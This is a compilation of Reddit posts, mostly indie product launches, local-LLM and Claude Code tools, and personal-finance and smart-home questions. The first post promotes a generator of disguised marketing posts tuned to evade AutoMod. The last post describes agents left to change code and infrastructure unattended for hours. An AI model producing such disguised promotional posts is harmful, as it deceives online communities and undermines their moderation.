I've been quietly turning those notes into a small tool. it's called LaunchReddit. you describe your product, pick 1–3 subreddits, and it generates:

- 3 warmup posts for each sub (story-first, no links, just to build trust)

- 2 launch posts with subreddit-specific angles (risk-scored and edited multiple times by Claude Sonnet)

- short reply templates for when people ask "how does it work" or "isn't this just spam"

- a 7-day posting schedule

- a risk score per post so you know if it'll survive AutoMod

the output is intentionally imperfect on purpose, trying to sound like a redditor, not a marketer.

First kit's completely free: www.launchreddit.site

would love brutal feedback on the post quality. does it actually sound like something that would survive in r/SaaS or r/indiehackers?

And of course, ANY new function to the tool will be fully FREE for your existing kits! ☺️

r/SideProject Daniel_SES

I built an MCP server that lets Claude audit and fix your SEO - 7 days of building, sharing what I learned

Been shipping micro-SaaS recently. This time, I built something I actually wanted: an SEO layer that lives inside Claude.

The problem I kept running into: I know my sites have SEO issues. I don't want to learn SEO. I want Claude to handle it.

So I built SEOLint - an MCP server you connect to Claude Desktop or Claude Code in 2 minutes. Then Claude can:

  • Scan any URL and return structured issues with AI-written fix instructions
  • Remember every scan - labels issues as NEW / PERSISTING / REGRESSED
  • Analyse your whole site: goal, ICP, primary keyword, structural gaps across pages
  • Show you the actual broken HTML element so fixes are immediate, not generic

The workflow: get_site_intelligence -> get_open_issues -> fix in codebase -> mark_issues_fixed

Here's a demo: https://www.youtube.com/watch?v=RNAr07ZLHFg

Also ships as a CLI (npx @randomcode-seolint/cli scan https://yoursite.com) and REST API for GitHub Actions.

Stack: Next.js 16 + Supabase + Anthropic API (Haiku for fix instructions) + Vercel

7 days from idea to launch. Happy to answer questions about the build.

seolint.dev

r/LocalLLaMA ReflectionOk9332

Open-source dashboard for managing multi-agent teams — supports Hermes Agent natively

I've been running a team of AI agents for a few months and hit the classic coordination wall. One agent was fine. Four was chaos. More than that, I was a full-time middle manager.

That led to Org Studio — an open-source dashboard that applies real org design principles to agent teams. Think: mission, values, domain boundaries, and a feedback loop that makes agents improve over time.

Multi-runtime support: Org Studio connects to both OpenClaw and Hermes Agent simultaneously. Each runtime implements a simple interface (discover, send, health), and the registry routes everything automatically.

The fun part: a Hermes agent can u/mention an OpenClaw agent in a task comment, and the notification routes to the right runtime. Cross-runtime communication via a task board.

Features:

• Team topology with domain ownership

• Event-driven task board (agents pick up work instantly)

• Vision-driven sprints (define outcomes, not tasks)

• Auto-detected feedback → operating principles injected into agent context

• Multi-runtime: OpenClaw + Hermes out of the box

• File storage by default, optional Postgres

Try it:
npx create-org-studio@latest
GitHub: https://github.com/ToomeSauce/org-studio

Site: https://orgstudio.dev

Origin story: https://orgstudio.dev/blog/origin-story

Happy to answer questions about the architecture or the org design approach.

r/mildlyinteresting Key-Tank-8093

found a fried maggot in my pistachio yesterday

r/homeassistant OfficialGreenTea

Energy data to Apple Home wth HomeBridge?

I’ve connected apple homekit to home assistant, where homekit is the front-end for my household and I connect all our sources using home assistant in the backend. This has been working great so far.

I noticed iPhone widgets have the ability to visualise energy dashboards. I have this data available in home assistant. Is there any way to push this data to HomeKit, for example using the HomeBridge integration?

r/personalfinance eggwuah646

Buying a used vehicle.

Good morning all, I have somewhat of a financial literacy going on, but sometimes I feel like that doesn’t mean much. anyways…

Me and my wife bring home about 8k a month, we want to buy a full size SUV. We have a home loan at about 240k. And we want to pay off the house asap. But she is pregnant with our 2nd kid. A current vehicle we are looking at is a 2013 Chevrolet suburban with 150k miles for 12k. The interior is perfect and mechanically it sounds fine with a good looking car fax.. but I’m hesitant to pull the trigger. With 3k down I’m looking at $450 a month for 2 years at 4% apr..

I want to hear your guys opinion, is this smart or is this just flat out stupid ?

r/ollama dreamy_walker

I wanted Ollama to hold a job, not just answer prompts, so I built this

Most local AI tools built around Ollama are good at one run.

What I kept missing was the work layer around the model:

- where the rules live

- where unfinished work lives

- where outputs accumulate

- where reusable procedures live

- where an automation can come back later without starting from zero

So I built Holaboss:

- open-source desktop + runtime

- uses Ollama as a local OpenAI-compatible backend

- Each AI worker gets a persistent workspace

- workspaces can hold AGENTS.md, workspace.yaml, local skills, apps, outputs, memory, and runtime state

- The goal is not just "better replies"

- The goal is "can a local AI setup keep holding the same work over time?"

Why I built it:

I don't think the hard part is getting one decent answer from a local model anymore.

The harder problem is whether the system can come back tomorrow, see what was pending, preserve context cleanly, and keep moving without relying on one giant chat transcript.

Ollama setup is straightforward:

- run Ollama locally

- point Holaboss to: http://localhost:11434/v1

- use API key: ollama

- pick your installed model in the desktop app

Current status:

- MIT licensed

- macOS supported today

- Windows/Linux is still in progress

If you're deep in the Ollama ecosystem, I'd love feedback on where this should go next:

- coding workflows?

- research workspaces?

- recurring automation / ops?

- better inspectability and handoff?

GitHub: https://github.com/holaboss-ai/holaboss-ai

If you think the direction is useful, a star ⭐️ would be appreciated.

r/SideProject Financial-Muffin1101

From scared solo dev with zero sales experience to 600 MRR in ~4 weeks – what I actually did (fully documented)

A few weeks ago I was terrified to launch my first SaaS. Zero sales background, no network, no marketing skills. I kept thinking “who the hell is going to pay me?”

Today I’m sitting at $600 MRR!

Here’s exactly what I did, step by step. No fluff, no “I crushed it” narrative — just the real actions that moved the needle.

1. I didn’t wait for validation

I didn’t run surveys, build waitlists, or ask people if they would pay.

I simply built the one thing I know deeply.

That was it. No customer interviews. No fancy validation process. Just deep personal pain + technical knowledge.

2. I chose a “boring” problem on purpose

Everyone loves building flashy AI tools or consumer apps.

I deliberately went for something boring but painful: helping new SaaS sites look trustworthy by showing they care about privacy and accessibility.

Why? Because boring problems are much easier to market.

Founders who just launched don’t need another fun toy. They need something that makes their site stop looking sketchy so people actually sign up.

3. What I actually built & shipped

I created a simple automated scanner that checks a website for:

- Privacy issues (trackers, cookies, GDPR/CCPA signals)

- Accessibility problems (basic WCAG checks)

- Overall trust signals

If it passes, the user gets a clean trust badge they can display on their site + a backlink.

The whole product is deliberately minimal. No complex dashboards, no AI hype — just something that solves a real, recurring pain.

4. How I got the first users (zero ad spend)

- Posted raw, honest updates on Reddit ([r/SaaS](r/SaaS), [r/indiehackers](r/indiehackers), [r/microsaas](r/microsaas))

- Replied helpfully in relevant threads

- Reached out personally to a few recently launched founders

- Offered free scans + honest feedback

When small technical issues appeared, I woke up early, fixed them, manually rescanned affected users, and sent personalized emails.

That personal touch alone brought in feedback and conversions.

5. Key lessons I learned fast

- You don’t need perfect validation. You need to solve a problem you understand deeply.

- Boring products are easier to sell than exciting ones — especially to other indie founders.

- Personal support and quick fixes still work incredibly well in 2026.

- Consistency + showing up while scared beats waiting for confidence.

I’m still a solo dev working long days, still full of doubts sometimes, but the progress is real.

I’ll keep documenting the journey here (onboarding struggles, what’s working, what’s not).

If you’re a solo founder who’s scared to start or doubting yourself — just know I was exactly where you are.

You don’t need to be a marketer. You don’t need validation.

You just need to build the one thing you know really well.

Keep shipping.

Edited: formatting

r/homeassistant Own-Chemistry-495

Is a SSD 500gb overkill? I looking for a SSD for my Thin Client 5070 maybe a cheap 128GB is more then enough for Home Assistant. I found a 500gb SSD for 35 Bucks from Ebay.

r/LifeProTips Nighthawkies

LPT:Fixing your Social media feeds (actually getting new stuff that you'd want to see)

I had an issue where I kept getting recommended stuff I wasn't interested in , but interacted with anyway because it was the only thing available.

or kept getting recommended the same things I'd already seen.

To fix this, whenever I noticed something interesting I'd interact with it right away, and if I didn't then I'd save it, so later when my algorithm stagnated I could start from those , and it would start recommending me more similar stuff to that.

r/personalfinance strongerthenbefore20

How would you rate my current financial situation, and what can I being doing better to maximize my earnings and savings?

Background

  • I am 28 years old, single, and don't have any kids. I have no financial debts of any kind.
  • I currently have a full-time retail sales job where I make roughly $1,500 every other week after taxes. My average monthly expenses including rent are around $1,800 a month.
  • I have $37,000 in a HYSA, $3,200 in my checking account, $7,800 in my 401k, and $9,000 in my Roth IRA. I have currently put $2,000 in my IRA for the year and have set up monthly payments that will get me to the $7,500 limit by the end of the year.
  • Overall, how would you rate my financial situation? Am I in a good place, or do I need to change somethings? Also, aside from trying to find a higher paying job, what can I do to increase my earnings and savings?
r/ChatGPT SargDuck

Why do LLMs refuse to format the Universal Declaration of Human Rights?

I asked ChatGPT and another LLM to do some light formatting on the document, but they both refused to. It is specific to the english version as I did some formatting on other languages and it worked fine. Any reason for that?

r/ChatGPT KingSlayer-tvu

Subscribed user yet limited image generation?

Before anyone says “it resets”, I went an entire weekend without generating any images on ChatGPT, only for it to tell me to wait twenty minutes because I hit the limit. I had only been using it for about an hour and generated fewer than ten images.

Something about this does not feel right, and I am starting to realize I may not need to stay subscribed if it is no different from other image generator apps. At least those show your credits clearly, while ChatGPT leaves you guessing and ends up wasting your time.

r/interestingasfuck Distinct-Question-16

While dinosaurs went extinct 66 million years ago, recent genetic and molecular studies place the origin of the cactus family (Cactaceae) at roughly 30 to 35 million years ago. Meaning no cactus while dinosaurs.

r/ChatGPT RUSTIOO_FOR_LIFE

CHAT GPT BROKEN

When I send it something it finishes writing an deletes the message anyone can relate?

r/leagueoflegends Master_Outside8981

A 2V1 Yasuo Play

r/SideProject Shot_Fudge_6195

I'm building a Skill that lets agents find and pay for data on their own

I'm a PM turned founder, and I kept hitting the same problem: every AI agent I saw could think great but couldn't access anything useful without a human setting up API keys, billing accounts, and integrations for each data source.

So I started building a unified skill for agents. One endpoint. Agent hits it, discovers what data is available, pays per request, and gets the data back. No human setting up billing. No managing 15 vendor dashboards.

The idea in simple terms:

  • Agent needs company financials? → Queries our API → Sees 3 vendors offer it → Pays $0.002 per request → Gets the data
  • Agent needs weather + flight prices + hotel rates for a trip? → One API, pays as it goes
  • Data vendors list their data once → Get paid automatically when agents use it

Think of it like a marketplace where the buyers are AI agents and the sellers are data providers, with payments happening at the protocol level.

Where I'm at:

  • Working prototype with 3 data sources connected
  • payment flow working end-to-end
  • Talking to design partners on both sides (agent builders + data vendors)
  • Solo founder, bootstrapping for now

I'd love honest feedback: 1. Does this problem resonate with anyone building agents? 2. What data sources would you want access to first? 3. Am I overthinking the payments piece — would API keys + Stripe be enough?

Here's my mvp product if anyone's curious: https://monid.ai/

r/ClaudeCode WorldlinessHorror708

A Claude Code plugin trivial for harness engineering

Repo: https://github.com/Done-0/openarche

OpenArche is a harness-first Claude Code plugin for non-trivial engineering work. It keeps complex tasks from closing before planning, validation, review, and closeout are explicit.

Features

  • Task grading: decides whether a task stays light or enters harness control
  • Embedding-based routing: uses the configured embedding backend to separate plain questions from execution work without language-specific keyword lists
  • Persistent sessions: materializes .openarche/sessions//state.json only when execution work actually starts
  • Stage gates: keeps validation, review, and maintenance open until they are actually closed
  • Context injection: adds current task state, gate reasons, and relevant local knowledge
  • Knowledge recall: retrieves repository-local knowledge first, then global knowledge, through embeddings and link expansion
  • Background closeout: captures reusable knowledge after the task stops

Installation

  1. add the marketplace entry:/plugin marketplace add Done-0/openarche
  2. install the plugin:/plugin install openarche
  3. reload plugins:/reload-plugin
  4. run setup:/openarche:setup

If you use local embeddings, the first successful run may need network access to download the model files. If you prefer API-backed embeddings, switch to remote in /openarche:config.

How It Works

  1. Use Claude Code as usual.
  2. Light tasks stay lightweight. Non-light tasks receive harness context first, and .openarche/sessions//state.json is materialized only for explicit execution work or, by default, after actual write activity starts.
  3. OpenArche tells Claude Code why the task was gated, which stages are still open, and which local knowledge is relevant.
  4. The status line and session state keep showing what is still open, so the task does not quietly close too early.
  5. Validation, review, and maintenance stay open until the required evidence is recorded inside the current session state and evidence directory.
  6. When the task stops, OpenArche closes out the session and queues reusable knowledge capture for that transcript.
r/ChatGPT Previous-Drop-1742

Asking DeepSeek if Taiwan is a country.

r/leagueoflegends 1niceHensler

Looking for Tutorials/Let’s Plays/Guides for Demacia Rising

As the title says, I don’t really care for the gameplay of this Event and don’t have the time to learn every mechanic and such.

I’ve been dependent on Reddit posts (army-setup-wise) to unlock new settlements for a while now and it’s getting quite boring. I really only care for the rewards so it’s a pain play this by myself and constantly fail.

I’d really appreciate any help. Thanks a lot in advance!

r/pelotoncycle skyy_mall

Jess King’s 3/19 Techno Ride’s playlist

Is maybe the best playlist i’ve ever encountered on the platform, (and i’m 2,010 rides for context!) I’ve already taken it 3 times, it is mind-meltingly good!!

r/ClaudeCode Direct-Push-7808

I got tired of re-explaining everything when switching between Claude Code and Codex — so I built a bridge that gives each tool the other's conversation history

The problem

When you switch between Claude Code and Codex, your conversation history stays siloed. Claude has no idea what you built in Codex last week, and vice versa.

With usage limits on both platforms, switching tools mid-project is increasingly common -and every time you do, you lose all the context from your previous sessions.

What I built

context-bridge — a Python CLI with zero external dependencies that reads directly from the local data stores both tools already maintain:

- Codex: ~/.codex/state_5.sqlite + JSONL rollouts

- Claude Code: ~/.claude/projects/*.jsonl

It installs as a skill in both tools, so the AI knows when and how to search the other's history.

GitHub: github.com/vguptaa45/context-bridge

r/SideProject Dramatic-Air-6507

Thorne 20% Off Discount Code

I’ve been using Thorne supplements for a while now and they’re one of the few brands I keep coming back to. The biggest difference compared to a lot of supplement companies is the ingredient quality. Thorne is known for using well-researched forms of vitamins and minerals, and many of their products are third-party tested, which gives a bit more confidence that you’re actually getting what’s on the label.

What I like is that their lineup covers a lot of practical daily supplements without a ton of unnecessary fillers. Things like their Basic Nutrients multivitamin, Vitamin D/K2, Magnesium, and Creatine are pretty popular because they focus on effective dosing rather than flashy marketing. Capsules are usually easy to take, and I’ve never noticed the weird aftertaste or stomach issues that some cheaper supplements can cause.

They’re definitely not the cheapest option out there, but that seems to be the tradeoff for quality control and cleaner formulations. If you’re someone who takes supplements regularly and cares about ingredient sourcing and testing, Thorne is one of the more reputable brands in the space. It’s a solid option if you’re trying to build a simple, reliable supplement stack without guessing which brands are legit.

You can use this link to get 20% off discount on your order as well. Hope it helps!
https://get.aspr.app/SH1eP2

r/mildlyinteresting BurnMeInTheStars

This wild rabbit has a hole in the ear.

r/LocalLLaMA StacksHosting

Why APEX Matters for MoE Coding Models and why it's NOT the same as K quants

I posted about my APEX quantization of QWEN Coder 80B Next yesterday and got a ton of great questions. Some people loved it, some people were skeptical, and one person asked "what exactly is the point of this when K quants already do mixed precision?"

It's a great question. I've been deep in this for the last few days running APEX on my own hardware and I want to break down what I've learned because I think most people are missing the bigger picture here.

So yes K quants like Q4_K_M already apply different precision to different layers. Attention gets higher precision, feed-forward gets lower. That's been in llama.cpp for a while and it works.

But here's the thing nobody is talking about.

MoE models have a coherence problem. I was reading this article last night and it clicked for me. When your coding agent is working across multiple files, different experts handle different tokens. The expert that processed your collision logic might not be the same expert that processes your entity initialization. The routing is efficient but the representation gets fragmented.

Think about that. Your agent is writing a function in one file that references a variable in another file and different experts handled each piece. What holds it all together?

The shared experts and attention layers. These fire on EVERY token no matter which routed experts get selected. They're the coherence layer. The glue. Without them your MoE model falls apart on complex multi-file coding sessions.

This is where APEX changes the game.

APEX knows about MoE architecture. It keeps those shared experts and attention at Q8, near lossless. The routed experts that only fire 3% of the time? Those get compressed harder. You're preserving the exact layers that matter most for keeping your agent coherent across long sessions.

Standard K quants have no idea about MoE roles. They see a feed-forward layer and compress it the same whether it's a shared expert that fires on every token or a routed expert that fires on 3% of tokens.

Now here's where it gets even better.

I ran my APEX quantization with a code-calibrated imatrix. 50,575 code samples. Not Wikipedia, not general chat, CODE. That imatrix tells APEX which specific weights within those shared coherence layers fire most during code generation, tool calling, and error recovery.

So it's three layers of optimization stacked:

  1. APEX preserves the shared/attention layers that maintain coherence across expert routing
  2. The code imatrix prioritizes the weights within those layers that actually fire during coding
  3. MoE routing means 97% of expert weights are idle per token so they compress aggressively with almost zero quality loss

That's why Mudler's APEX I-Quality beats F16 on perplexity (6.527 vs 6.537). It's not just compressing less. It's compressing smarter. The coherence layers stay intact while everything else gets shrunk.

For anyone building coding agents on MoE models this matters. A lot. Your agent staying coherent across a 10 file refactoring session is literally the difference between useful output and garbage.

APEX is still very new like a week or two old I think but I believe this is way forward with quality and speed especially for people with limited hardware like myself

Again I'm learning this just like anyone else but I'm here to share what I'm learning as i learn it

Credit to Mudler (Ettore Di Giacinto) for creating APEX and LocalAI.

Credit to the article that helped me connect the dots on the coherence problem: https://x.com/sudoingX/status/2040836083731333381

My APEX I-Quality quant with code-calibrated imatrix: https://huggingface.co/stacksnathan/Qwen3-Coder-Next-80B-APEX-I-Quality-GGUF

Mudler APEX repo with tons of choices
https://huggingface.co/collections/mudler/apex-quants-gguf

r/leagueoflegends Professional-Try-231

which region should i pick?

i live in the ME but im not sure if playing in that server is a good idea

does ping matter in League? i have never played this game before and im used to over 200 ping in games

r/geography Melodic-Tennis-1622

Mediterranean pollution

I don’t know if this is the right sub but for those who live on the Mediterranean, has anyone noticed how polluted the sea has become especially this year?

I usually swim every week or so but I stopped in January after the intense storms we had until very recently, and I have never seen so much trash…

I live in Tunisia and I found plastic products from Italy, Algeria, Greece, France (and of course the usual tunisian products) for the first time in my life! In February I literally found a Tunisian product that was only launched in the late 80’s…

Is this a local problem or is the Mediterranean in its most polluted era? I’ve never seen the sea like this

r/personalfinance traanquil

logged into my old 401K, it was converted and reduced to 0; i don't know where the money went

I logged into an old 401k from a previous employer which had a significant amount of money in it. I was surprised to find that the balance at zero...the funds had been "converted." I was given no notice about this, and I cannot find out where this money went. I called ADP and they told me it went to fidelity. I went to fidelity and they have no record of it. WTH is going on and is this even legal? How did this happen with no notice to me whatsoever?

r/funny jesstermc

At a real church in NC. See you all at noon 😂

r/ollama iamtheamn

FolliA v0.6: Native Android client for Ollama with Real-Time Streaming and Markdown support.

Hey everyone,

I'm an IT student and in my spare time, I've been developing FolliA, a native Android app designed to connect to your local Ollama instances. My goal was to build something lightweight, fast, and completely private (no cloud, no telemetry, just direct communication with your server).

I just released the v0.6 beta and wanted to share it with this community, as I've implemented a lot of features based on early feedback:

  • Real-time streaming: Watch the AI type its responses in real-time.
  • Session Context: The app now handles conversation history properly.
  • Markdown UI: Full support for code blocks, headers, and lists (with Light/Dark/AMOLED themes).
  • Dynamic Model Selection: Switch between your installed models directly from the chat UI.
  • IPv6 & Custom Ports: You can now easily configure the app to access your home server remotely via your personal VPN.

It's 100% free and open-source. You can grab the APK or check out the code here: https://github.com/iamtheamn/FolliA

I'd love to hear your feedback, bug reports, or feature requests to help me improve it further.

Thanks !

r/interestingasfuck isosaleh

Windtunnel dance routine

r/SideProject QuantumOtter514

Built a launch platform for products that aren't AI tools, Live Today 🚀

Been working on this one for a while and it's finally live.

Product51 is a launch platform for non-AI products. Meaning the product itself isn't an AI tool, though it may very well have been built using AI. The distinction matters to me: there are tons of great products out there that just happen to not have "AI-powered" anywhere in their marketing, and right now they're getting buried.

I built it because I kept seeing the same problem. Launch platforms are flooded with AI tools and it's getting hard to find anything else. Wanted a dedicated space for everything else.

It's early, we're actively launching new products, and I'm looking for more to feature.

If you've built something and want to get it in front of people, check it out: productfiftyone.com

Also at risk of being ironic, also launching on PH, you can check out the launch page here:

https://www.producthunt.com/products/product-51?utm_source=other&utm_medium=social

Would love any feedback too, happy to answer questions 👇

r/personalfinance Hellomyguy9090

401k loan, vested balance

Hello so I took out a loan on my 401k for about $6500 because with my company you can only loan 50% of my vested balance, I still have $6500 in my 401k what happens to that amount if I decide to leave the company. I know if I default It will be deemed a distribution with the 10% penality and taxes, but with what's left do I need to roll it over to a Roth 401k?

r/personalfinance FJanon02

How to get out of a serious hole

Going through divorce. Husband became a drug addict almost 2 years ago. Lost his business and income. Blew all our savings and because of me being the only one paying bills racked up about $23k in credit card debt. I can no longer make the minimum payment. I can’t afford an attorney. For the divorce or bankruptcy. I am drowning. I own my home but the bills by myself are unmanageable. I am looking for a roommate, I’m doing door dash and Uber Eats to try and bring in some extra. I don’t qualify for food stamps because I don’t have children. I would ideally like to do the hardship program on my credit card and keep my care credit as I do have dogs and it’s nice for vet emergencies. Should I just stop paying? I’m applying for other jobs that pay more and have more benefits. But haven’t had any bites yet.

Any and all advice appreciated

r/mildlyinteresting mckenner1122

My sticks of butter were all misprinted the same way, about 3.25 TB off.

r/nextfuckinglevel Hellvis_50s

2 Skateboarders exchanging boards mid-air

r/ClaudeCode dydzio

Apparently Anthropic does not hunt OpenClaw hard enough...

r/leagueoflegends Past-Firefighter2173

Giantx vs Team Heretics PMT

GX wins quite comfortably. Early game was quite equal but Isma's ganks and Jun's plays made the game unplayable fo TH.

r/SideProject lupo-01

Yapit – PDF and webpage reader with TTS that doesn't suck

Yapit converts PDFs and web pages to audio, with a vision-LLM pipeline that handles math and complex layout instead of garbling them. I built it because I read a lot of papers and content online, but drift off after two paragraphs. Listening while following along keeps me focused and lowers the bar to actually start.

Every TTS tool I tried broke on complex formatting. Papers with math, citations, figure references, page numbers in the middle of sentences. You either get garbled output or you're listening to raw LaTeX.

Yapit converts everything to markdown as a common format. For web pages, defuddle handles the extraction and strips clutter from web pages, presenting the main article content in a clean, consistent format. For PDFs, a vision LLM rewrites each page into markdown with annotation tags that separate what you see from what gets read aloud. Math is rendered visually but gets spoken alt text. Citations like "[13]" or "(Schmidhuber, 1970)" are silently displayed. Page numbers and headers are removed entirely.

Both extraction and audio are cached by content hash, so the same content is never processed or synthesized twice.

Self-hosting works with any OpenAI-compatible TTS server (vLLM-Omni, ...) and any OpenAI-compatible vision model for PDF extraction:

git clone --depth 1 https://github.com/yapit-tts/yapit.git && cd yapit cp .env.selfhost.example .env.selfhost make self-host 

Kokoro TTS also runs in the browser via WebGPU on desktop.

Try it on Attention Is All You Need (all voices cached, no account needed).

Or paste any URL:

GitHub: https://github.com/yapit-tts/yapit (AGPL-3)

r/HistoryPorn Hammer_Price

Historic photos of TIBET 1924-26 & the NW Frontier 1932 & 1938 (794x600) were featured at Olympia Auctions (UK) on March 29. Reported by Rare Book Hub.

This lot with over 300 images sold for £6,500.00 ($ 8,582) well above the presale high estimate of £1,000

(Excerpts from catalog notes)

PHOTOGRAPHS OF TIBET, CIRCA 1924-26, AND THE NORTH-WEST FRONTIER, 1932 & 1938
oblong folio (265 x 345mm), over 320 matt silver prints, mounted on card album leaves, recto and verso, most captioned in ink on the mounts (some mounts detached, album without covers or backstrip)

A very well presented and captioned album of photographs of Tibet taken by a British official or army officer in the 1920s. The photographs include Frank Ludlow who ran an English school in Gyantse between 1923 and 1926, and Frederick Williamson, a British Political Officer. The photographs show many images of Tibetan people, ceremonies, events, buildings and views.

The same March 29 Olympia event also saw sales of photographic lots depicting China, Japan and India from the late 19th and early 20th century

r/ChatGPT GC_Vos

Anybody is else stopped using ChatGPT and not looking back?

I used to really like using ChatGPT. It was very useful to me in a variety of ways, like coding, assisting with writing, working on DIY project etc. It was one of the first well developed AI tools and early on it felt really groundbreaking.

Last year however too many large cons started coming up.

Firstly, I really started to distrust whatever it was saying, because it could speak the truth or flatout lie with the same level of confidence. I ended up debating or error correcting chatgpt way too much compared to just using it as a useful tool. Every time I asked for something I wanted to double-check what it was saying, at which point it just became kinda useless to me.

Secondly, the weird behaviour with forcing users onto specific models, only to then partially backtrack because users became upset. How do you have access to all of this user data and not understand the user?

Thirdly, OpenAI cooperating with the US department of War was a huge red flag to me. OpenAI then going into damage control as they have done before just felt like a dumb PR decision. I basically stopped using it and switched to LeChat.

Anybody else now avoiding chatgpt entirely?

r/PhotoshopRequest Alarmed-Pirate-6599

Edit please!

I had photos taken of my and my sons this last week and I love this photo but can’t get over my chin? double chin? area, like idk if she edited the photo some before giving it to me or what but if you look closely I don’t understand why part of my chin looks really clear then part of it looks muddled? Like I can’t enjoy the photo cause my chin looks so off to me 🤦🏻‍♀️

$5 to whoever can fix it please!!

This is the exact photo she gave me, so I haven’t changed anything on it.

r/comfyui the_frizzy1

Wan2.2 AIO: T2V, I2V and First to Last Frame on Consumer Hardware

Been genuinely enjoying the Wan2.2 Rapid All-In-One lately.

https://huggingface.co/Phr00t/WAN2.2-14B-Rapid-AllInOne

One file download, one workflow, and you get Text-to-Video, Image-to-Video, and First to Last Frame all working out of the box in ComfyUI. No separate VAE, no text encoder matching, nothing. Just drop it in and generate.

I tested it on my RTX 3060 and also covered the GGUF path for anyone on 4 to 6GB VRAM. Made a full video going through the setup, benchmarks, and all three modalities if anyone wants to see it.

Free workflow is on my CivitAI as always.

https://civitai.com/user/The_frizzy1

I also fixed the Node issue in Phr00ts repo and made a standalone node to work with my workflow and his:

https://huggingface.co/The-frizzy1/Custom-Advanced-VACE-Node

r/LocalLLaMA Mrinohk

Gemma4:26b's reasoning capabilities are crazy.

Been experimenting with it, first on my buddy's compute he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his macbook from 600 miles away. Originally my home agent was run through Gemini-3-Flash because no other model I've tried has been able to match it's reasoning ability.

The script(s) I have it running through are a re-implementation of a multi-speaker smart home speaker setup, with several rasperry pi zeroes functioning as speaker satellites for a central LLM hub, right now a raspberry pi 5, soon to be an M4 mac mini prepped for full local operation. It also has a dedicated discord bot I use to interact with it from my phone and PC for more complicated tasks, and those requiring information from an image, like connector pinouts I want help with.

I've been experimenting with all sorts of local models, optimizing my scripts to reduce token input from tools and RAG to allow local models to function and not get confused, but none of them have been able to keep up. My main benchmark, "send me my grocery list when I get to walmart" requires a solid 6 different tool calls to get right, between learning what walmart I mean from the memory database (especially challenging if RAG fails to pull it up), getting GPS coordinates for the relevant walmart by finding it's address and putting it into a dedicated tool that returns coordinates from an address or general location (Walmart, [CITY, STATE]), finding my grocery list within it's lists database, and setting up a phone notification event with that list, nicely formatted, for when I approach those coordinates. The only local model I was able to get to perform that task was GPT-OSS 120b, and I'll never have the hardware to run that locally. Even OSS still got confused, only successfully performing that task with a completely clean chat history. Mind you, I keep my chat history limited to 30 entries shared between user, model, and tool inputs/returns. Most of it's ability to hold a longer conversation is held through aggressive memory database updates and RAG.

Enter Gemma4, 26B MoE specifically. Handles the walmart task beautifully. Started trying other agentic tasks, research on weird stuff for my obscure project car, standalone ECU crank trigger stuff, among other topics. A lot of the work is done through dedicated planning tools to keep it fast with CoT/reasoning turned off but provide a sort of psuedo-reasoning, and my tools+semantic tool injection to try and keep it focused, but even with all that helping it, no other model family has been able to begin to handle what I've been throwing at it.

It's wild. Interacting with it feels almost exactly like interacting with 3 Flash. It's a little bit stupider in some areas, but usually to the point where it just needs a little bit more nudging, rather than full on laid out instructions on what to do to the point where I might as well do it all myself like I have to do with other models.

Just absolutely beyond impressed with it's capabilities for how small and fast it is.

r/personalfinance EnvironmentalAsk2603

Ideal Credit Card - new grad high spending

Hello,

I am a new grad in Canada , starting a new FT job making 80000. I am required to travel for work, will expense accommodation (Airbnb/hotel) fees, food expenses \~100$/day (Mon-Friday), and car rental + gas. I am required to pay for this, and then am reimbursed.

I was auto-rejected from Amex cobalt, but I am thinking I should have probably waited until I had been paid a few times.

I have a monthly Roger’s phone bill and currently have a basic cashback card with TD.

I am looking for help choosing a credit card to take advantage of this high spending.

Thanks!

r/ClaudeAI LateList1487

I built a Cowork plugin that makes Claude Code and Cowork run as an autonomous loop for 8+ hours. Here's the full breakdown.

I'm not a developer. I'm a founder who's been building a SaaS platform (React/TypeScript/Supabase) with AI tools for months. At some point I got tired of being the human relay between Claude Code and Cowork — so I built a plugin to remove myself from the loop entirely.

The plugin is called aura-autonomous.zip. It's a proper installable Cowork plugin — not a folder of prompts, not a markdown cheatsheet. A real .claude-plugin/plugin.json structure with skills and slash commands.

Here's everything.

What the plugin does

It turns Claude Code and Cowork into two specialized agents with defined roles, a shared communication protocol, and a three-layer intervention system. The loop runs without human input.

Claude Code = Commander. It holds the test plan, orchestrates the sequence, decides what to fix and how. Outputs strict STEP [N]: instructions. Reads RESULT [N]: responses. Writes state to a shared JSON file on disk.

Cowork = Executor. It uses Claude for Chrome to read the Claude Code tab directly — no copy-paste. Picks up STEP [N], executes in the browser, reports back with RESULT [N]:. Reads and writes the same JSON file.

The JSON file is the only bridge between them. No native messaging, no Chrome inter-agent API (there's a known conflict — Bug #29057 — that makes that approach unreliable).

What's inside the plugin

Six skills, four slash commands.

Skills:

  • protocol — defines the STEP/RESULT numbering system and sync rules
  • chrome-automation — handles React textarea injection, ProseMirror fields, dynamic button clicks
  • intervention-router — decides which layer to use for each bug type
  • commander — Claude Code's orchestration role and cadence
  • executor — Cowork's execution role and reporting format
  • session-state — manages the shared JSON file structure

Slash commands:

  • /aura:commander — activates Claude Code in Commander mode
  • /aura:executor — activates Cowork in Executor mode
  • /aura:status — dumps current loop state from the JSON file
  • /aura:report — generates a full session report on completion

The three-layer intervention router

This is the part that took longest to design. Not every bug gets the same fix. The plugin routes automatically:

  • Code-level bug → Claude Code pushes a fix to GitHub. The repo resyncs automatically. No UI interaction needed.
  • UI/behavior bug → Cowork injects a prompt into the no-code builder (max 800 chars) via javascript_tool. Waits for build completion before continuing.
  • Infrastructure bug → Claude Code handles via SSH or Supabase CLI. Never the web interface.

The router is the reason the loop can run unattended. Without it, every bug hits the same intervention path and you get bottlenecks — or worse, the wrong tool trying to do the wrong job.

The technical debt this plugin papers over

I want to be honest about what the plugin has to work around, because if you build something similar you'll hit these:

React textarea injection. Standard type commands don't work on ProseMirror inputs or React-controlled fields. The plugin uses execCommand('insertText') for ProseMirror, nativeInputValueSetter + event dispatch for React inputs, and explicit javascript_tool clicks for buttons with loading states. Each one cost me an hour.

The STEP/RESULT protocol is non-negotiable. Without strict numbered format, the loop degrades over time. Claude Code starts guessing. Cowork starts interpreting. After 2-3 hours you have two agents having a conversation about what happened rather than executing. The protocol is what keeps them synchronized across a full session.

Cowork plugin format. The old commands/ directory format throws a deprecation warning. The correct structure is skills/*/SKILL.md inside .claude-plugin/. Took me one failed version to figure that out.

Results from the first real run

I ran this against my live SaaS platform: 8+ hours, unattended, covering 6 known bugs across all three intervention layers. I went to sleep. I came back to a /aura:report output listing what was fixed, what failed, and why.

It's not perfect. The loop occasionally loses sync when a browser action takes longer than expected. But the gap between "me manually testing and fixing" and "this running overnight" is not close.

TL;DR
